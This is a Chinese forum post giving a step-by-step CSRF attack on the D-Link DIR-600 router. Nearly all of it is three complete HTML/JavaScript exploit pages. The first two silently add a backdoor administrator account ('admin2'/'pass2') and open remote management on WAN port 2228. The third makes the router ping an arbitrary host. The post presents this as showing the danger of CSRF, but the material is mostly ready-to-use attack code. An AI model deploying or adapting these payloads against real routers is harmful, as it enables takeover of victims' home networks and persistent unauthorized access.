搏宇 發表於 2014-4-25 13:34:19

使用CSRF漏洞攻击D-link路由器全过程

<p><strong>1,介绍</strong></p>
<p>本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器(硬件版本:BX,固件版本:2.16)的CSRF漏洞为例。<br />D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。</p>
<p><strong>2,CSRF漏洞说明</strong></p>
<p>如果某些request请求中没有csrf&nbsp; token或不需要密码授权,会存在CSRF漏洞,该漏洞允许攻击者伪造登录用户发送请求,因此可以导致用户执行攻击者想要的操作请求。<br />通过D-link 管理面板的CSRF漏洞,攻击者可以做以下操作:</p>
<p>@1,添加一个新的管理帐号;<br />@2,启用路由器的远程管理;<br />@3,ping特定的机器;此操作只需要登录路由器就可以实现,需要知道路由器的WAN IP地址。</p>
<p><strong>3,PART1:给路由器增加一个新的管理帐号</strong></p>
<p>需要两个request请求来完成</p>
<p>REQUEST1:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode29">&lt;html&gt;<br />&lt;body&gt;<br />    &lt;script&gt;<br />      function submitRequest()<br />      {<br />      var xhr = new XMLHttpRequest();<br />      xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);<br />      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");<br />      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br />      xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");<br />    xhr.withCredentials = "true";<br />      var body = "&lt;?xml version=\"1.0\" encoding=\"UTF-8\" ?&gt;"+<br />"<br />&lt;postxml&gt;"+<br />"&lt;module&gt;"+<br />    "&lt;service&gt;DEVICE.ACCOUNT&lt;/service&gt;"+<br />    "&lt;device&gt;"+<br />      "&lt;account&gt;"+<br />      "&lt;seqno/&gt;"+<br />      "&lt;max&gt;1&lt;/max&gt;"+<br />      "&lt;count&gt;2&lt;/count&gt;"+<br />      "&lt;entry&gt;"+<br />          "&lt;name&gt;admin&lt;/name&gt;"+<br />          "<br />&lt;password&gt;==OoXxGgYy==&lt;/password&gt;"+<br />          "&lt;group&gt;0&lt;/group&gt;"+<br />          "&lt;description/&gt;"+<br />      "&lt;/entry&gt;"+<br />      "&lt;entry&gt;"+<br />          "&lt;name&gt;admin2&lt;/name&gt;"+<br />          "<br />&lt;password&gt;pass2&lt;/password&gt;"+<br />          "&lt;group&gt;0&lt;/group&gt;"+<br />          "&lt;description/&gt;"+<br />      "&lt;/entry&gt;"+<br />      "&lt;/account&gt;"+<br />      "&lt;session&gt;"+<br />      "&lt;captcha&gt;0&lt;/captcha&gt;"+<br />      "&lt;dummy/&gt;"+<br />      "&lt;timeout&gt;180&lt;/timeout&gt;"+<br />      "&lt;maxsession&gt;128&lt;/maxsession&gt;"+<br />      "&lt;maxauthorized&gt;16&lt;/maxauthorized&gt;"+<br />      "&lt;/session&gt;"+<br />    "&lt;/device&gt;"+<br />"&lt;/module&gt;"+<br />"&lt;module&gt;"+<br />    "&lt;service&gt;HTTP.WAN-1&lt;/service&gt;"+<br />    "&lt;inf&gt;"+<br />      "&lt;web&gt;2228&lt;/web&gt;"+<br />      "&lt;weballow&gt;"+<br />      "&lt;hostv4ip/&gt;"+<br />      "&lt;/weballow&gt;"+<br />    "&lt;/inf&gt;"+<br />"&lt;/module&gt;"+<br />"&lt;module&gt;"+<br />    "&lt;service&gt;HTTP.WAN-2&lt;/service&gt;"+<br />    "&lt;inf&gt;"+<br />      "&lt;web&gt;2228&lt;/web&gt;"+<br />      "&lt;weballow&gt;"+<br />      "&lt;hostv4ip/&gt;"+<br />      "&lt;/weballow&gt;"+<br />    "&lt;/inf&gt;"+<br />"&lt;/module&gt;"+<br />"&lt;/postxml&gt;";<br />      xhr.send(body);<br />      }<br />    &lt;/script&gt;<br />&lt;form action="#"&gt;<br />      &lt;input type="button" value="Submit request1" onclick="submitRequest();" /&gt;<br />    &lt;/form&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;</div><br />REQUEST2:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode30">&lt;html&gt;<br />&lt;body&gt;<br />    &lt;script&gt;<br />      function submitRequest()<br />      {<br />      var xhr = new XMLHttpRequest();<br />      xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);<br />      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");<br />      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br />      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");<br />    xhr.withCredentials = "true";<br />      var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";<br />      xhr.send(body);<br />      }<br />    &lt;/script&gt;<br />&lt;form action="#"&gt;<br />      &lt;input type="button" value="Submit request2" onclick="submitRequest();" /&gt;<br />    &lt;/form&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;</div><br />REQUEST1和REQUEST2中,默认的路由局域网IP地址是192.198.0.1,管理帐号是admin,REQUEST1中的request请求中,当密码字段为==OoXxGgYy==的时候,是不会修改admin帐号的密码的。这两个请求完成了管理帐号admin2的添加,同时启用了远程管理端口2228.</p>
<p><strong>PART2:ping特定的主机</strong></p>
<p>REQUEST3:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode31">&lt;html&gt;<br />&lt;body&gt;<br />    &lt;script&gt;<br />      function submitRequest()<br />      {<br />      var xhr = new XMLHttpRequest();<br />      xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);<br />      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");<br />      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br />      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");<br />    xhr.withCredentials = "true";<br />      var body = "act=ping&amp;dst=X.Y.Z.W";<br />      xhr.send(body);<br />      }<br />    &lt;/script&gt;<br />&lt;form action="#"&gt;<br />      &lt;input type="button" value="Submit request3" onclick="submitRequest();" /&gt;<br />    &lt;/form&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;</div><br />只需要求该代码中的X.Y.Z.W为你需要ping的主机IP地址就可以。</p>
頁: [1]
查看完整版本: 使用CSRF漏洞攻击D-link路由器全过程